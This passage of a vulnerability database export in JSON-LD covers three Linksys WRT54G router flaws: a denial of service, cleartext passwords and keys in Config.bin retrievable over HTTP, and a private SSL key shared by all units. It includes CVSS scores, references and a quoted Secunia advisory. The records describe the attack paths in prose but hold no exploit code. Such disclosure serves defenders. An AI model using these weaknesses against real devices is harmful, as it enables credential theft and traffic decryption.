"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1265",
"trust": 2.8
},
{
"db": "XF",
"id": "41127",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BID",
"id": "85099",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31390",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"id": "VAR-200803-0061",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:53:34.750000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41127"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41127"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1265"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1265"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31390"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85099"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31390"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85099"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"date": "2018-10-11T20:31:24.857000",
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Service disruption in routers (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
],
"trust": 0.6
}
}
VAR-200803-0059
Vulnerability from variot - Updated: 2023-12-18 11:44
The Linksys WRT54G router stores passwords and keys in cleartext in the Config.bin file, which might allow remote authenticated users to obtain sensitive information via an HTTP request for the top-level Config.bin URI. Linksys WRT54G Router is prone to an information disclosure vulnerability.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0059",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.8,
"vendor": "cisco linksys",
"version": null
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1263"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85074"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1263",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2008-1263",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-31388",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1263",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-141",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-31388",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G router stores passwords and keys in cleartext in the Config.bin file, which might allow remote authenticated users to obtain sensitive information via an HTTP request for the top-level Config.bin URI. Linksys WRT54G Router is prone to a information disclosure vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "VULHUB",
"id": "VHN-31388"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1263",
"trust": 2.8
},
{
"db": "XF",
"id": "41115",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "BID",
"id": "85074",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31388",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"id": "VAR-200803-0059",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:44:00.149000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-310",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41115"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41115"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1263"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1263"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31388"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85074"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31388"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85074"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"date": "2018-10-11T20:31:24.230000",
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Vulnerability to obtain important information in router",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
],
"trust": 0.6
}
}
VAR-200508-0264
Vulnerability from variot - Updated: 2023-12-18 11:41
Linksys WRT54G router uses the same private key and certificate for every router, which allows remote attackers to sniff the SSL connection and obtain sensitive information. This constant certificate/key pair is always used to access the device. This can allow an attacker to obtain the certificate/key pair and carry out various attacks. A complete compromise of the device is possible. Linksys WRT54G is a wireless router device that combines several functions.
TITLE: Linksys WRT54G Router Common SSL Private Key Disclosure
SECUNIA ADVISORY ID: SA16271
VERIFY ADVISORY: http://secunia.com/advisories/16271/
CRITICAL: Less critical
IMPACT: Exposure of sensitive information
WHERE:
From local network
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: Nick Simicich has reported a security issue in WRT54G, which can potentially be exploited by malicious people to gain knowledge of certain sensitive information. A user with knowledge of the private key can potentially decrypt router management traffic captured from the network.
PROVIDED AND/OR DISCOVERED BY: Nick Simicich
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200508-0264",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
}
],
"sources": [
{
"db": "BID",
"id": "14407"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2434"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nick Simicich njs@scifi.squawk.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.6
},
"cve": "CVE-2005-2434",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-13643",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2434",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200508-040",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-13643",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G router uses the same private key and certificate for every router, which allows remote attackers to sniff the SSL connection and obtain sensitive information. \nThis constant certificate/key pair is always used to access the device. \nThis can allow an attacker to obtain the certificate/key pair and carry out various attacks. \nA complete compromise of the device is possible. Linksys WRT54G is a wireless router device that combines several functions. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Router Common SSL Private Key Disclosure\n\nSECUNIA ADVISORY ID:\nSA16271\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16271/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nExposure of sensitive information\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nNick Simicich has reported a security issue in WRT54G, which\npotentially can be exploited by malicious people to gain knowledge of\ncertain sensitive information. A user with knowledge with the\nprivate key can potentially decrypt router management traffic\ncaptured from the network. \n\nPROVIDED AND/OR DISCOVERED BY:\nNick Simicich\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. 
\n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "PACKETSTORM",
"id": "38955"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14407",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "16271",
"trust": 1.8
},
{
"db": "NVD",
"id": "CVE-2005-2434",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1014596",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040",
"trust": 0.7
},
{
"db": "XF",
"id": "21635",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20050728 VULNERABILITY IN LINKSYS ROUTER ACCESS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-13643",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "38955",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "PACKETSTORM",
"id": "38955"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"id": "VAR-200508-0264",
"iot": {
